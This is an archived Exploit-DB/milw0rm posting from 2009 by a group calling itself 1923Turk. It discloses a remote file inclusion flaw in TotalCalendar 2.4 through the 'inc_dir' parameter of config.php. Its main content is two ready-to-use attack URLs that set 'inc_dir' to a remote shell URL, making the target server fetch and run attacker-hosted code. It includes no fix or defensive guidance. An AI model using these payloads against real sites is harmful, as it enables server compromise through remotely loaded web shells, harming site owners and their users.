TotalCalendar 2.4 inc_dir Remote File Inclusion Vulnerability

2009-04-20T00:00:00
ID EDB-ID:8494
Type exploitdb
Reporter DarKdewiL
Modified 2009-04-20T00:00:00

Description

TotalCalendar 2.4 (inc_dir) Remote File Inclusion Vulnerability. Webapps exploit for php platform

                                        
                                            //***********************************************************************//
//**********************1 9 2 3 T U R K - G R U P************************//
//_______________________________________________________________________//
//-----------------------------------------------------------------------//

<--[+]-->
 
[~] Home Page : "http://www.simpoe.com/"
[~] Download : "http://www.simpoe.com/calendre/TotalCalendar_2.4.zip"
[~] ScriptName: "Simpoe Event Calendar"
[~] Date: "20/04/2009"
[~] Time: "18:38"

<--[!]-->

[+] Bugs : Remote File Include
[+] D0rk : Not Dork :(
[+] Author : DarKdewiL
[+] GroupWeb : www.1923turk.biz
[+] Contact : darkdewil@1923turk.biz

[!] Note : You're too important for anyone <1923Turk>
   
<--[-]-->

(+)Vuln:

http://www.sitename.com/calendre/config.php?inc_dir=ShellURL

OR

http://www.sitename.com/config.php?inc_dir=ShellURL

//***********************************************************************//
//***********************************************************************//
//***********************************************************************//

# milw0rm.com [2009-04-20]